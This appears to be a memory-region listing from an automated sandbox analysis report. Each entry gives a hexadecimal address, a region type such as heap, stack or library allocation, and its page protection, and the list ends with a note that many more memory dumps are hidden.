15EC1BA0000
|
heap
|
page execute and read and write
|
||
2420148C000
|
trusted library allocation
|
page read and write
|
||
20DC3430000
|
trusted library allocation
|
page read and write
|
||
7FFC0119C000
|
trusted library allocation
|
page execute and read and write
|
||
15ED9EEB000
|
heap
|
page read and write
|
||
20DC2970000
|
trusted library allocation
|
page read and write
|
||
20DA89A0000
|
heap
|
page read and write
|
||
15EBFCE0000
|
heap
|
page read and write
|
||
10CB07B000
|
stack
|
page read and write
|
||
2E93FA18000
|
heap
|
page read and write
|
||
1132926F000
|
heap
|
page read and write
|
||
15ED9DF0000
|
trusted library allocation
|
page read and write
|
||
24906068000
|
heap
|
page read and write
|
||
2D584C79000
|
heap
|
page read and write
|
||
2E9418E5000
|
heap
|
page read and write
|
||
1DD54EAA000
|
heap
|
page read and write
|
||
190359E0000
|
remote allocation
|
page read and write
|
||
1DD55702000
|
heap
|
page read and write
|
||
EB33CFE000
|
stack
|
page read and write
|
||
20DC2950000
|
trusted library allocation
|
page read and write
|
||
7FFC010F3000
|
trusted library allocation
|
page read and write
|
||
7FFC010E4000
|
trusted library allocation
|
page read and write
|
||
19035B7F000
|
heap
|
page read and write
|
||
20DC2971000
|
trusted library allocation
|
page read and write
|
||
3BA9D7B000
|
stack
|
page read and write
|
||
15ED9DF1000
|
trusted library allocation
|
page read and write
|
||
7FFC01103000
|
trusted library allocation
|
page execute and read and write
|
||
1DD55713000
|
heap
|
page read and write
|
||
EE680FF000
|
stack
|
page read and write
|
||
11329213000
|
heap
|
page read and write
|
||
7FFC01480000
|
trusted library allocation
|
page read and write
|
||
2E93FA19000
|
heap
|
page read and write
|
||
20DC29A0000
|
trusted library allocation
|
page read and write
|
||
20DC32C0000
|
trusted library allocation
|
page read and write
|
||
1AD477000
|
stack
|
page read and write
|
||
24279C72000
|
heap
|
page read and write
|
||
211D9002000
|
trusted library allocation
|
page read and write
|
||
19035455000
|
heap
|
page read and write
|
||
7FFC01397000
|
trusted library allocation
|
page read and write
|
||
7FFC01460000
|
trusted library allocation
|
page read and write
|
||
AED567F000
|
stack
|
page read and write
|
||
15ED9F49000
|
heap
|
page read and write
|
||
15EC22BC000
|
trusted library allocation
|
page read and write
|
||
2E941900000
|
heap
|
page read and write
|
||
20DC3450000
|
trusted library allocation
|
page read and write
|
||
1569C896000
|
heap
|
page read and write
|
||
1DD54EFA000
|
heap
|
page read and write
|
||
CD9357D000
|
stack
|
page read and write
|
||
20DC29E0000
|
trusted library allocation
|
page read and write
|
||
1DD5A440000
|
trusted library allocation
|
page read and write
|
||
15ED9E00000
|
trusted library allocation
|
page read and write
|
||
7FFC01377000
|
trusted library allocation
|
page read and write
|
||
20388BD5000
|
heap
|
page read and write
|
||
28614BF000
|
stack
|
page read and write
|
||
2427B6D0000
|
heap
|
page read and write
|
||
24200B99000
|
trusted library allocation
|
page read and write
|
||
15EC2156000
|
trusted library allocation
|
page read and write
|
||
24200BCB000
|
trusted library allocation
|
page read and write
|
||
19035BAE000
|
heap
|
page read and write
|
||
24906067000
|
heap
|
page read and write
|
||
15ED9F2F000
|
heap
|
page read and write
|
||
1AD7F8000
|
stack
|
page read and write
|
||
2E9418F7000
|
heap
|
page read and write
|
||
19035513000
|
heap
|
page read and write
|
||
7DF4B34C0000
|
trusted library allocation
|
page execute and read and write
|
||
CD943CE000
|
stack
|
page read and write
|
||
19035B9B000
|
heap
|
page read and write
|
||
19035B80000
|
heap
|
page read and write
|
||
2D584C00000
|
heap
|
page read and write
|
||
20DA8B60000
|
heap
|
page read and write
|
||
24906029000
|
heap
|
page read and write
|
||
20DC2F00000
|
trusted library allocation
|
page read and write
|
||
11329060000
|
heap
|
page read and write
|
||
20DC31B0000
|
trusted library allocation
|
page read and write
|
||
20DA8A00000
|
heap
|
page read and write
|
||
20DC29C0000
|
trusted library allocation
|
page read and write
|
||
EE684FE000
|
stack
|
page read and write
|
||
CD933FE000
|
stack
|
page read and write
|
||
1DD54E58000
|
heap
|
page read and write
|
||
20DC3110000
|
trusted library allocation
|
page read and write
|
||
1DD5A69C000
|
heap
|
page read and write
|
||
15ED9E10000
|
trusted library allocation
|
page read and write
|
||
1AD579000
|
stack
|
page read and write
|
||
15ED9DF1000
|
trusted library allocation
|
page read and write
|
||
15ED9F19000
|
heap
|
page read and write
|
||
2D584AD0000
|
heap
|
page read and write
|
||
2E9418E7000
|
heap
|
page read and write
|
||
15EC1760000
|
trusted library allocation
|
page read and write
|
||
20DC3420000
|
trusted library allocation
|
page read and write
|
||
28560C13000
|
heap
|
page read and write
|
||
20DABC95000
|
trusted library allocation
|
page read and write
|
||
2489A100000
|
heap
|
page read and write
|
||
15EC1EFE000
|
trusted library allocation
|
page read and write
|
||
1569C866000
|
heap
|
page read and write
|
||
7FFC013B0000
|
trusted library allocation
|
page read and write
|
||
43E707B000
|
stack
|
page read and write
|
||
20DC2B4F000
|
heap
|
page read and write
|
||
15EC1D5D000
|
trusted library allocation
|
page read and write
|
||
107057D000
|
stack
|
page read and write
|
||
1DD5A702000
|
heap
|
page read and write
|
||
190354B1000
|
heap
|
page read and write
|
||
20388BC0000
|
trusted library allocation
|
page read and write
|
||
10CB1FB000
|
stack
|
page read and write
|
||
C1332B000
|
stack
|
page read and write
|
||
20DA8970000
|
heap
|
page read and write
|
||
2420149D000
|
trusted library allocation
|
page read and write
|
||
190353E0000
|
trusted library allocation
|
page read and write
|
||
7FFC012B1000
|
trusted library allocation
|
page read and write
|
||
CD93678000
|
stack
|
page read and write
|
||
15ED9DF0000
|
trusted library allocation
|
page read and write
|
||
7FFC0110D000
|
trusted library allocation
|
page execute and read and write
|
||
24279C7F000
|
heap
|
page read and write
|
||
19035B9C000
|
heap
|
page read and write
|
||
2E9418E4000
|
heap
|
page read and write
|
||
20DC3200000
|
trusted library allocation
|
page read and write
|
||
19035B6C000
|
heap
|
page read and write
|
||
20DC2A31000
|
heap
|
page read and write
|
||
1903544B000
|
heap
|
page read and write
|
||
15EDA140000
|
heap
|
page read and write
|
||
28560BE0000
|
remote allocation
|
page read and write
|
||
19035B9B000
|
heap
|
page read and write
|
||
19036000000
|
heap
|
page read and write
|
||
15EC1C51000
|
trusted library allocation
|
page read and write
|
||
28561402000
|
trusted library allocation
|
page read and write
|
||
20DC3150000
|
trusted library allocation
|
page read and write
|
||
20DC2F10000
|
trusted library allocation
|
page read and write
|
||
7FFC013D0000
|
trusted library allocation
|
page read and write
|
||
20DC2900000
|
heap
|
page execute and read and write
|
||
19035B96000
|
heap
|
page read and write
|
||
7FFC012BD000
|
trusted library allocation
|
page read and write
|
||
2489A04E000
|
heap
|
page read and write
|
||
1B56A429000
|
heap
|
page read and write
|
||
24905EC0000
|
heap
|
page read and write
|
||
2E93FA36000
|
heap
|
page read and write
|
||
15EC228C000
|
trusted library allocation
|
page read and write
|
||
211D8830000
|
heap
|
page read and write
|
||
20DA8B50000
|
trusted library allocation
|
page read and write
|
||
1B56A413000
|
heap
|
page read and write
|
||
CD936F7000
|
stack
|
page read and write
|
||
211D8690000
|
heap
|
page read and write
|
||
20DC2990000
|
trusted library allocation
|
page read and write
|
||
EB338FC000
|
stack
|
page read and write
|
||
19035B8F000
|
heap
|
page read and write
|
||
15EBFE71000
|
heap
|
page read and write
|
||
19035B7B000
|
heap
|
page read and write
|
||
15ED9F2F000
|
heap
|
page read and write
|
||
211D8877000
|
heap
|
page read and write
|
||
190354E3000
|
heap
|
page read and write
|
||
19035B79000
|
heap
|
page read and write
|
||
19035B9E000
|
heap
|
page read and write
|
||
19035B76000
|
heap
|
page read and write
|
||
15ED9DF0000
|
trusted library allocation
|
page read and write
|
||
1AD1FC000
|
stack
|
page read and write
|
||
19035B0B000
|
heap
|
page read and write
|
||
1DD5A63C000
|
heap
|
page read and write
|
||
21780902000
|
heap
|
page read and write
|
||
C13DFA000
|
stack
|
page read and write
|
||
20DC33A0000
|
trusted library allocation
|
page read and write
|
||
24905FC0000
|
trusted library allocation
|
page read and write
|
||
1B56A44E000
|
heap
|
page read and write
|
||
19035B9A000
|
heap
|
page read and write
|
||
15ED9F23000
|
heap
|
page read and write
|
||
20DBA800000
|
trusted library allocation
|
page read and write
|
||
15ED9F21000
|
heap
|
page read and write
|
||
15ED9F4F000
|
heap
|
page read and write
|
||
2427BD20000
|
trusted library allocation
|
page read and write
|
||
2427BD10000
|
trusted library allocation
|
page read and write
|
||
20DC2AF8000
|
heap
|
page read and write
|
||
15EBFE7F000
|
heap
|
page read and write
|
||
15ED9E10000
|
trusted library allocation
|
page read and write
|
||
20DC3380000
|
trusted library allocation
|
page read and write
|
||
211D887E000
|
heap
|
page read and write
|
||
1B56A476000
|
heap
|
page read and write
|
||
19035B7D000
|
heap
|
page read and write
|
||
1B56A330000
|
heap
|
page read and write
|
||
15ED9DF0000
|
trusted library allocation
|
page read and write
|
||
43E6BEE000
|
stack
|
page read and write
|
||
2E93F8F0000
|
heap
|
page read and write
|
||
CD9387F000
|
stack
|
page read and write
|
||
15ED9EC5000
|
heap
|
page read and write
|
||
15ED9DD0000
|
trusted library allocation
|
page read and write
|
||
1DD5A340000
|
trusted library allocation
|
page read and write
|
||
1569C880000
|
heap
|
page read and write
|
||
20DA89FA000
|
heap
|
page read and write
|
||
15EC17E0000
|
heap
|
page read and write
|
||
211D8844000
|
heap
|
page read and write
|
||
15EC2282000
|
trusted library allocation
|
page read and write
|
||
20DC2B33000
|
heap
|
page read and write
|
||
19035B71000
|
heap
|
page read and write
|
||
20DABC8C000
|
trusted library allocation
|
page read and write
|
||
43E73FE000
|
stack
|
page read and write
|
||
2E9418EA000
|
heap
|
page read and write
|
||
11329B00000
|
heap
|
page read and write
|
||
20DC3270000
|
trusted library allocation
|
page read and write
|
||
7FFC01282000
|
trusted library allocation
|
page read and write
|
||
20DC2990000
|
trusted library allocation
|
page read and write
|
||
19035B00000
|
heap
|
page read and write
|
||
20388BE0000
|
trusted library allocation
|
page read and write
|
||
2427BD66000
|
heap
|
page read and write
|
||
19035B9B000
|
heap
|
page read and write
|
||
19035BB9000
|
heap
|
page read and write
|
||
1DD54EA4000
|
heap
|
page read and write
|
||
211D8846000
|
heap
|
page read and write
|
||
15ED9E60000
|
heap
|
page read and write
|
||
EB339FE000
|
stack
|
page read and write
|
||
20DC2940000
|
trusted library allocation
|
page read and write
|
||
7FFC01350000
|
trusted library allocation
|
page read and write
|
||
2427BDA5000
|
heap
|
page read and write
|
||
15EC1CB0000
|
trusted library allocation
|
page read and write
|
||
15EC20C6000
|
trusted library allocation
|
page read and write
|
||
7FFC01310000
|
trusted library allocation
|
page read and write
|
||
15ED9E20000
|
trusted library allocation
|
page read and write
|
||
CD92F85000
|
stack
|
page read and write
|
||
1DD5A350000
|
trusted library allocation
|
page read and write
|
||
7FFC01380000
|
trusted library allocation
|
page read and write
|
||
19035B9C000
|
heap
|
page read and write
|
||
2E941A9B000
|
heap
|
page read and write
|
||
43E71F7000
|
stack
|
page read and write
|
||
20DC29B0000
|
trusted library allocation
|
page read and write
|
||
EB33DFD000
|
stack
|
page read and write
|
||
7FFC011B0000
|
trusted library allocation
|
page read and write
|
||
211D882D000
|
heap
|
page read and write
|
||
1DD54F02000
|
heap
|
page read and write
|
||
28610FE000
|
stack
|
page read and write
|
||
1569C86F000
|
heap
|
page read and write
|
||
211D8852000
|
heap
|
page read and write
|
||
21780829000
|
heap
|
page read and write
|
||
7FFC013A0000
|
trusted library allocation
|
page read and write
|
||
2427BCC0000
|
trusted library allocation
|
page read and write
|
||
FD712FB000
|
stack
|
page read and write
|
||
19035B9D000
|
heap
|
page read and write
|
||
20DABD48000
|
trusted library allocation
|
page read and write
|
||
24906113000
|
heap
|
page read and write
|
||
1DD5A6F8000
|
heap
|
page read and write
|
||
15EBFEAF000
|
heap
|
page read and write
|
||
2E93F7B0000
|
heap
|
page read and write
|
||
24201484000
|
trusted library allocation
|
page read and write
|
||
2D585402000
|
trusted library allocation
|
page read and write
|
||
1B56A400000
|
heap
|
page read and write
|
||
15ED9DD4000
|
trusted library allocation
|
page read and write
|
||
20DAB591000
|
trusted library allocation
|
page read and write
|
||
15ED9E00000
|
trusted library allocation
|
page read and write
|
||
2E941DD2000
|
heap
|
page read and write
|
||
10CA90C000
|
stack
|
page read and write
|
||
1132923E000
|
heap
|
page read and write
|
||
7FFC01370000
|
trusted library allocation
|
page read and write
|
||
24279AB0000
|
unkown
|
page readonly
|
||
19035502000
|
heap
|
page read and write
|
||
20DC335D000
|
trusted library allocation
|
page read and write
|
||
7FFC011BC000
|
trusted library allocation
|
page execute and read and write
|
||
1569C876000
|
heap
|
page read and write
|
||
7FFC01320000
|
trusted library allocation
|
page read and write
|
||
1DD5A364000
|
trusted library allocation
|
page read and write
|
||
20388938000
|
heap
|
page read and write
|
||
20DC2970000
|
trusted library allocation
|
page read and write
|
||
63E587E000
|
stack
|
page read and write
|
||
C13979000
|
stack
|
page read and write
|
||
2427BDB0000
|
heap
|
page read and write
|
There are 1273 hidden memdumps, click here to show them.